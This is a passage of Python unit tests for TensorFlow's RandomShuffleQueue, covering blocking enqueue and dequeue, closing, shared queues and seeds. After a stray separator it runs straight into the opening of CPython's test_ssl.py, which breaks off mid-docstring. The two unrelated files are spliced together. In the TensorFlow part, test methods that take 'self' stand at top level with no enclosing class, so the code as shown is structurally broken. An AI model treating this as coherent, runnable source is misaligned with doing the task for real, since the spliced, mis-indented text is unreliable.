    fill_sizes_op = size_queue.enqueue_many((batch_sizes,))
    total = sum(batch_sizes)

    # A second queue holds `total` payload elements.
    payload = [random.randint(0, 100) for _ in range(total)]
    data_queue = data_flow_ops.RandomShuffleQueue(total, 0, dtypes_lib.int32,
                                                  ((),))
    fill_data_op = data_queue.enqueue_many((payload,))

    # Subgraph: dequeue one size, then DequeueUpTo that many elements.
    batch_t = data_queue.dequeue_up_to(size_queue.dequeue())
    fill_sizes_op.run()
    fill_data_op.run()

    collected = []
    for _ in batch_sizes:
      collected.extend(batch_t.eval())
    self.assertItemsEqual(payload, collected)
def testDequeueFromClosedQueue(self):
  """After close(), queued items remain dequeuable until they run out."""
  with self.cached_session():
    queue = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
    values = [10.0, 20.0, 30.0, 40.0]
    fill_op = queue.enqueue_many((values,))
    shutdown_op = queue.close()
    pop_t = queue.dequeue()
    fill_op.run()
    shutdown_op.run()
    seen = []
    for _ in values:
      seen.append(pop_t.eval())
    self.assertItemsEqual([[value] for value in values], seen)

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                 "is closed and has insufficient"):
      pop_t.eval()
def testBlockingDequeueFromClosedQueue(self):
  """close() lifts min_after_dequeue so blocked dequeues can drain the queue."""
  with self.cached_session() as sess:
    min_size = 2
    q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue()
    enqueue_op.run()

    results = []
    # Manually dequeue until we hit min_size.
    results.append(sess.run(dequeued_t))
    results.append(sess.run(dequeued_t))

    def blocking_dequeue():
      # These two dequeues would drop the size below min_size, so they
      # block until close_op runs on the main thread.
      results.append(sess.run(dequeued_t))
      results.append(sess.run(dequeued_t))
      self.assertItemsEqual(elems, results)
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=blocking_dequeue)
    dequeue_thread.start()
    time.sleep(0.1)
    # The dequeue thread blocked when it hit the min_size requirement.
    self.assertEqual(len(results), 2)
    close_op.run()
    dequeue_thread.join()
    # Once the queue is closed, the min_size requirement is lifted.
    self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
  """A blocked dequeue on an empty queue fails once the queue is closed."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    close_op = q.close()
    dequeued_t = q.dequeue()

    finished = []  # Needs to be a mutable type

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)
      finished.append(True)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    self.assertEqual(len(finished), 0)
    close_op.run()
    dequeue_thread.join()
    self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
  """A second dequeue_many fails after close(); the first one succeeds."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_many(4)

    enqueue_op.run()

    progress = []  # Must be mutable

    def dequeue():
      self.assertItemsEqual(elems, sess.run(dequeued_t))
      progress.append(1)
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)
      progress.append(2)

    self.assertEqual(len(progress), 0)
    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    # Poll until the first dequeue has completed (progress == [1]).
    for _ in range(100):
      time.sleep(0.01)
      if len(progress) == 1:
        break
    self.assertEqual(len(progress), 1)
    time.sleep(0.01)
    close_op.run()
    dequeue_thread.join()
    self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
  """A blocked dequeue_up_to returns the leftover elements after close().

  dequeue_up_to(3) first returns a full batch of 3; the second call blocks
  until close() runs and then returns the single remaining element instead
  of raising OutOfRangeError.
  """
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_up_to(3)

    enqueue_op.run()

    results = []

    def dequeue():
      results.extend(sess.run(dequeued_t))
      # assertEquals is a deprecated alias; use assertEqual for consistency
      # with the rest of this file.
      self.assertEqual(3, len(results))
      results.extend(sess.run(dequeued_t))
      self.assertEqual(4, len(results))

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
    self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
  """After close(), dequeue_up_to may return fewer than min_after_dequeue.

  With min_after_dequeue=2 and 4 elements, the first dequeue_up_to(3)
  returns 3; the second blocks until close() and then returns the last
  remaining element.
  """
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        capacity=10,
        min_after_dequeue=2,
        dtypes=dtypes_lib.float32,
        shapes=((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_up_to(3)

    enqueue_op.run()

    results = []

    def dequeue():
      results.extend(sess.run(dequeued_t))
      # assertEquals is a deprecated alias; use assertEqual for consistency
      # with the rest of this file.
      self.assertEqual(3, len(results))
      # min_after_dequeue is 2, we ask for 3 elements, and we end up only
      # getting the remaining 1.
      results.extend(sess.run(dequeued_t))
      self.assertEqual(4, len(results))

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
    self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
  """A failed dequeue_many must release its reserved (undelivered) elements."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_many(3)
    # Drains whatever is left after the failed dequeue_many below.
    cleanup_dequeue_t = q.dequeue_many(q.size())

    enqueue_op.run()

    results = []

    def dequeue():
      results.extend(sess.run(dequeued_t))
      self.assertEqual(len(results), 3)
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)
      # While the last dequeue failed, we want to ensure that it returns
      # any elements that it potentially reserved to dequeue. Thus the
      # next cleanup should return a single element.
      results.extend(sess.run(cleanup_dequeue_t))

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
    self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
  """dequeue_many on an empty queue fails when the queue is closed."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
    close_op = q.close()
    dequeued_t = q.dequeue_many(4)

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
  """dequeue_up_to on an empty queue fails when the queue is closed."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
    close_op = q.close()
    dequeued_t = q.dequeue_up_to(4)

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testEnqueueToClosedQueue(self):
  """Enqueueing after close() raises CancelledError."""
  with self.cached_session():
    queue = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
    push_op = queue.enqueue((10.0,))
    shutdown_op = queue.close()

    push_op.run()
    shutdown_op.run()

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
      push_op.run()
def testEnqueueManyToClosedQueue(self):
  """enqueue_many after close() raises CancelledError."""
  with self.cached_session():
    queue = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
    values = [10.0, 20.0, 30.0, 40.0]
    push_op = queue.enqueue_many((values,))
    shutdown_op = queue.close()

    push_op.run()
    shutdown_op.run()

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
      push_op.run()
def testBlockingEnqueueToFullQueue(self):
  """An enqueue on a full queue blocks until a dequeue frees capacity."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue((50.0,))
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      sess.run(blocking_enqueue_op)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()
    # The dequeue ops should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    results = []
    for _ in elems:
      results.append(dequeued_t.eval())
    # The fifth dequeue picks up the element the blocked enqueue inserted.
    results.append(dequeued_t.eval())
    self.assertItemsEqual(elems + [50.0], results)
    # There wasn't room for 50.0 in the queue when the first element was
    # dequeued.
    self.assertNotEqual(50.0, results[0])
    thread.join()
def testBlockingEnqueueManyToFullQueue(self):
  """enqueue_many on a full queue blocks and completes as space frees up."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      sess.run(blocking_enqueue_op)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()
    # The dequeue ops should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    results = []
    for _ in elems:
      time.sleep(0.01)
      results.append(dequeued_t.eval())
    # Two extra dequeues pick up the elements inserted by the blocked
    # enqueue_many.
    results.append(dequeued_t.eval())
    results.append(dequeued_t.eval())
    self.assertItemsEqual(elems + [50.0, 60.0], results)
    # There wasn't room for 50.0 or 60.0 in the queue when the first
    # element was dequeued.
    self.assertNotEqual(50.0, results[0])
    self.assertNotEqual(60.0, results[0])
    # Similarly for 60.0 and the second element.
    self.assertNotEqual(60.0, results[1])
    thread.join()
def testBlockingEnqueueToClosedQueue(self):
  """close() waits for a pending enqueue; later enqueues are cancelled."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue((50.0,))
    dequeued_t = q.dequeue()
    close_op = q.close()

    enqueue_op.run()

    def blocking_enqueue():
      # Expect the operation to succeed since it will complete
      # before the queue is closed.
      sess.run(blocking_enqueue_op)

      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
        sess.run(blocking_enqueue_op)

    thread1 = self.checkedThread(target=blocking_enqueue)
    thread1.start()

    # The close_op should run after the first blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    def blocking_close():
      sess.run(close_op)

    thread2 = self.checkedThread(target=blocking_close)
    thread2.start()

    # Wait for the close op to block before unblocking the enqueue.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    results = []
    # Dequeue to unblock the first blocking_enqueue_op, after which the
    # close will complete.
    results.append(dequeued_t.eval())
    self.assertTrue(results[0] in elems)

    thread2.join()
    thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
  """A partially completed enqueue_many finishes before close() takes effect."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
    close_op = q.close()
    size_t = q.size()

    enqueue_op.run()
    self.assertEqual(size_t.eval(), 3)

    def blocking_enqueue():
      # This will block until the dequeue after the close.
      sess.run(blocking_enqueue_op)

    thread1 = self.checkedThread(target=blocking_enqueue)
    thread1.start()

    # First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
    # elements, and is blocked waiting for one more element to be dequeued.
    for i in range(50):
      queue_size = size_t.eval()
      if queue_size == 4:
        break
      elif i == 49:
        self.fail(
            "Blocking enqueue op did not execute within the expected time.")
      time.sleep(0.1)

    def blocking_close():
      sess.run(close_op)

    thread2 = self.checkedThread(target=blocking_close)
    thread2.start()

    # Unblock the first blocking_enqueue_op in blocking_enqueue.
    q.dequeue().eval()

    thread2.join()
    thread1.join()

    # At this point the close operation will complete, so the next enqueue
    # will fail.
    with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
      sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
  """Two queue handles sharing a shared_name alias the same queue state."""
  with self.cached_session():
    q1 = data_flow_ops.RandomShuffleQueue(
        1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
    q1.enqueue((10.0,)).run()

    # TensorFlow TestCase adds a default graph seed (=87654321). We check if
    # the seed computed from the default graph seed is reproduced.
    seed = 887634792
    q2 = data_flow_ops.RandomShuffleQueue(
        1,
        0,
        dtypes_lib.float32, ((),),
        shared_name="shared_queue",
        seed=seed)

    size1 = q1.size()
    size2 = q2.size()

    def check_sizes(expected):
      # Both handles must report the same size for the shared queue.
      self.assertEqual(size1.eval(), expected)
      self.assertEqual(size2.eval(), expected)

    check_sizes(1)
    self.assertEqual(q2.dequeue().eval(), 10.0)
    check_sizes(0)
    q2.enqueue((20.0,)).run()
    check_sizes(1)
    self.assertEqual(q1.dequeue().eval(), 20.0)
    check_sizes(0)
def testSharedQueueSameSessionGraphSeedNone(self):
  """An unseeded second handle must accept the existing shared queue's seed."""
  with self.cached_session():
    q1 = data_flow_ops.RandomShuffleQueue(
        1,
        0,
        dtypes_lib.float32, ((),),
        shared_name="shared_queue",
        seed=98765432)
    q1.enqueue((10.0,)).run()

    # If both graph and op seeds are not provided, the default value must be
    # used, and in case a shared queue is already created, the second queue op
    # must accept any previous seed value.
    random_seed.set_random_seed(None)
    q2 = data_flow_ops.RandomShuffleQueue(
        1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")

    # Both handles see the single element enqueued through q1.
    for size_t in (q1.size(), q2.size()):
      self.assertEqual(size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
  """Re-opening a shared queue with mismatched attributes fails at run time."""
  with self.cached_session():
    # Each case: shared name, kwargs for the original queue, kwargs for the
    # mismatched twin, and the fragment the resulting error must mention.
    float32 = dtypes_lib.float32
    cases = [
        ("q_a", dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         dict(capacity=15, min_after_dequeue=5, dtypes=float32),
         "capacity"),
        ("q_b", dict(capacity=10, min_after_dequeue=0, dtypes=float32),
         dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         "min_after_dequeue"),
        ("q_c", dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         dict(capacity=10, min_after_dequeue=5, dtypes=dtypes_lib.int32),
         "component types"),
        ("q_d", dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         dict(capacity=10, min_after_dequeue=5, dtypes=float32,
              shapes=[(1, 1, 2, 3)]),
         "component shapes"),
        ("q_e", dict(capacity=10, min_after_dequeue=5, dtypes=float32,
                     shapes=[(1, 1, 2, 3)]),
         dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         "component shapes"),
        ("q_f", dict(capacity=10, min_after_dequeue=5, dtypes=float32,
                     shapes=[(1, 1, 2, 3)]),
         dict(capacity=10, min_after_dequeue=5, dtypes=float32,
              shapes=[(1, 1, 2, 4)]),
         "component shapes"),
        ("q_g", dict(capacity=10, min_after_dequeue=5, dtypes=float32),
         dict(capacity=10, min_after_dequeue=5,
              dtypes=(float32, dtypes_lib.int32)),
         "component types"),
        ("q_h", dict(capacity=10, min_after_dequeue=5, dtypes=float32,
                     seed=12),
         dict(capacity=10, min_after_dequeue=5, dtypes=float32, seed=21),
         "random seeds"),
    ]
    for shared_name, first_kwargs, second_kwargs, message in cases:
      original = data_flow_ops.RandomShuffleQueue(
          shared_name=shared_name, **first_kwargs)
      mismatched = data_flow_ops.RandomShuffleQueue(
          shared_name=shared_name, **second_kwargs)
      original.queue_ref.op.run()
      with self.assertRaisesOpError(message):
        mismatched.queue_ref.op.run()
def testSelectQueue(self):
  """from_list dispatches enqueue/dequeue to the queue picked at runtime."""
  with self.cached_session():
    num_queues = 10
    queues = [
        data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
        for _ in xrange(num_queues)
    ]
    # Enqueue/Dequeue into a dynamically selected queue
    for _ in xrange(20):
      index = np.random.randint(num_queues)
      selected = data_flow_ops.RandomShuffleQueue.from_list(index, queues)
      selected.enqueue((10.,)).run()
      self.assertEqual(selected.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
  """from_list with an out-of-range index fails when the op actually runs."""
  with self.cached_session():
    first = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    second = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
    bad_queue = data_flow_ops.RandomShuffleQueue.from_list(3, [first, second])
    with self.assertRaisesOpError("is not in"):
      bad_queue.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
  """Runs `dequeue_op`, expecting it to be cancelled (e.g. session closed)."""
  with self.assertRaisesOpError("was cancelled"):
    sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
  """Runs `dequeue_many_op`, expecting it to be cancelled."""
  with self.assertRaisesOpError("was cancelled"):
    sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
  """Runs `dequeue_up_to_op`, expecting it to be cancelled."""
  with self.assertRaisesOpError("was cancelled"):
    sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
  """Runs `enqueue_op`, expecting it to be cancelled."""
  with self.assertRaisesOpError("was cancelled"):
    sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
  """Runs `enqueue_many_op`, expecting it to be cancelled."""
  with self.assertRaisesOpError("was cancelled"):
    sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
  """Closing the session cancels every blocked queue operation."""
  with self.cached_session() as sess:
    # An empty queue: all dequeue variants will block.
    q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
        (),))
    dequeue_op = q_empty.dequeue()
    dequeue_many_op = q_empty.dequeue_many(1)
    dequeue_up_to_op = q_empty.dequeue_up_to(1)

    # A full queue: both enqueue variants will block.
    q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
    sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
    enqueue_op = q_full.enqueue((6.0,))
    enqueue_many_op = q_full.enqueue_many(([6.0],))

    threads = [
        self.checkedThread(
            self._blockingDequeue, args=(sess, dequeue_op)),
        self.checkedThread(
            self._blockingDequeueMany, args=(sess, dequeue_many_op)),
        self.checkedThread(
            self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
        self.checkedThread(
            self._blockingEnqueue, args=(sess, enqueue_op)),
        self.checkedThread(
            self._blockingEnqueueMany, args=(sess, enqueue_many_op))
    ]
    for t in threads:
      t.start()
    time.sleep(0.1)
    sess.close()  # Will cancel the blocked operations.
    for t in threads:
      t.join()
def testDequeueManyInDifferentOrders(self):
  """Different seeds produce different dequeue_many orderings."""
  with self.cached_session():
    # Specify seeds to make the test deterministic
    # (https://en.wikipedia.org/wiki/Taxicab_number).
    first_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=1729)
    second_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=87539319)
    fill_first = first_q.enqueue_many(([1, 2, 3, 4, 5],))
    fill_second = second_q.enqueue_many(([1, 2, 3, 4, 5],))
    drain_first = first_q.dequeue_many(5)
    drain_second = second_q.dequeue_many(5)

    for fill_op in (fill_first, fill_first, fill_second, fill_second):
      fill_op.run()

    draws = [[], [], [], []]
    draws[0].extend(drain_first.eval())
    draws[1].extend(drain_second.eval())
    first_q.close().run()
    second_q.close().run()
    draws[2].extend(drain_first.eval())
    draws[3].extend(drain_second.eval())

    # No two of the four draws may coincide.
    for i in range(1, 4):
      for j in range(i):
        self.assertNotEqual(draws[i], draws[j])
def testDequeueUpToInDifferentOrders(self):
  """Different seeds produce different dequeue_up_to orderings."""
  with self.cached_session():
    # Specify seeds to make the test deterministic
    # (https://en.wikipedia.org/wiki/Taxicab_number).
    first_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=1729)
    second_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=87539319)
    fill_first = first_q.enqueue_many(([1, 2, 3, 4, 5],))
    fill_second = second_q.enqueue_many(([1, 2, 3, 4, 5],))
    drain_first = first_q.dequeue_up_to(5)
    drain_second = second_q.dequeue_up_to(5)

    for fill_op in (fill_first, fill_first, fill_second, fill_second):
      fill_op.run()

    draws = [[], [], [], []]
    draws[0].extend(drain_first.eval())
    draws[1].extend(drain_second.eval())
    first_q.close().run()
    second_q.close().run()
    draws[2].extend(drain_first.eval())
    draws[3].extend(drain_second.eval())

    # No two of the four draws may coincide.
    for i in range(1, 4):
      for j in range(i):
        self.assertNotEqual(draws[i], draws[j])
def testDequeueInDifferentOrders(self):
  """Different seeds produce different single-element dequeue orderings."""
  with self.cached_session():
    # Specify seeds to make the test deterministic
    # (https://en.wikipedia.org/wiki/Taxicab_number).
    first_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=1729)
    second_q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, ((),), seed=87539319)
    fill_first = first_q.enqueue_many(([1, 2, 3, 4, 5],))
    fill_second = second_q.enqueue_many(([1, 2, 3, 4, 5],))
    pop_first = first_q.dequeue()
    pop_second = second_q.dequeue()

    for fill_op in (fill_first, fill_first, fill_second, fill_second):
      fill_op.run()

    draws = [[], [], [], []]
    for _ in range(5):
      draws[0].append(pop_first.eval())
      draws[1].append(pop_second.eval())
    first_q.close().run()
    second_q.close().run()
    for _ in range(5):
      draws[2].append(pop_first.eval())
      draws[3].append(pop_second.eval())

    # No two of the four draws may coincide.
    for i in range(1, 4):
      for j in range(i):
        self.assertNotEqual(draws[i], draws[j])
def testBigEnqueueMany(self):
  """An enqueue_many larger than capacity completes incrementally.

  The queue holds 5 elements; enqueueing 10 fills it, blocks, and finishes
  as dequeues make room.
  """
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
    elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    enq = q.enqueue_many((elem,))
    deq = q.dequeue()
    size_op = q.size()

    enq_done = []

    def blocking_enqueue():
      enq_done.append(False)
      # This will fill the queue and then block until enough dequeues happen.
      sess.run(enq)
      enq_done.append(True)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()

    # The enqueue should start and then block.
    results = []
    results.append(deq.eval())  # Will only complete after the enqueue starts.
    self.assertEqual(len(enq_done), 1)
    self.assertEqual(sess.run(size_op), 5)

    for _ in range(3):
      results.append(deq.eval())

    time.sleep(0.1)
    self.assertEqual(len(enq_done), 1)
    self.assertEqual(sess.run(size_op), 5)

    # This dequeue will unblock the thread.
    results.append(deq.eval())
    time.sleep(0.1)
    self.assertEqual(len(enq_done), 2)
    thread.join()

    # Drain the remaining 5 elements, checking the size each step.
    for i in range(5):
      self.assertEqual(size_op.eval(), 5 - i)
      results.append(deq.eval())
      self.assertEqual(size_op.eval(), 5 - i - 1)

    self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
  """A dequeue_many larger than capacity completes once enough is enqueued."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
    elem = np.arange(4, dtype=np.int32)
    enq_list = [q.enqueue((e,)) for e in elem]
    deq = q.dequeue_many(4)

    results = []

    def blocking_dequeue():
      # Will only complete after 4 enqueues complete.
      results.extend(sess.run(deq))

    thread = self.checkedThread(target=blocking_dequeue)
    thread.start()
    # The dequeue should start and then block.
    for enq in enq_list:
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      self.assertEqual(len(results), 0)
      sess.run(enq)

    # Enough enqueued to unblock the dequeue
    thread.join()
    self.assertItemsEqual(elem, results)
# Run the TensorFlow test runner when this file is executed as a script.
if __name__ == "__main__":
  test.main()
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
# Import ssl through test.support so the whole test module is skipped
# (rather than erroring) on interpreters built without SSL support.
ssl = support.import_module("ssl")

PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)  # protocol ids exposed by this build
HOST = support.HOST  # loopback host used by the networked tests
def data_file(*name):
    """Return the path of a test-data file living next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.

CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
# Password-protected variants of the key/cert files above.
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")

# empty CRL
CRLFILE = data_file("revocation.crl")

# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")

SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")

# Malformed / corner-case certificates used by the negative tests.
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")  # deliberately non-existent path
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")

DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
    """If verbose, print the current exception, preceded by `prefix`."""
    formatted = ' '.join(traceback.format_exception(*sys.exc_info()))
    if support.verbose:
        sys.stdout.write(prefix + formatted)
def can_clear_options():
    """True if this OpenSSL can clear context options (0.9.8m or higher)."""
    minimum = (0, 9, 8, 13, 15)
    return ssl._OPENSSL_API_VERSION >= minimum
def no_sslv2_implies_sslv3_hello():
    """True for OpenSSL 0.9.7h or higher."""
    minimum = (0, 9, 7, 8, 15)
    return ssl.OPENSSL_VERSION_INFO >= minimum
def have_verify_flags():
    """True if verify flags are available (OpenSSL 0.9.8 or higher)."""
    minimum = (0, 9, 8, 0, 15)
    return ssl.OPENSSL_VERSION_INFO >= minimum
def asn1time(cert_time):
    """Normalize an ASN.1 time string for comparison on OpenSSL 0.9.8i.

    Some versions of OpenSSL ignore seconds, see #18207; on that exact
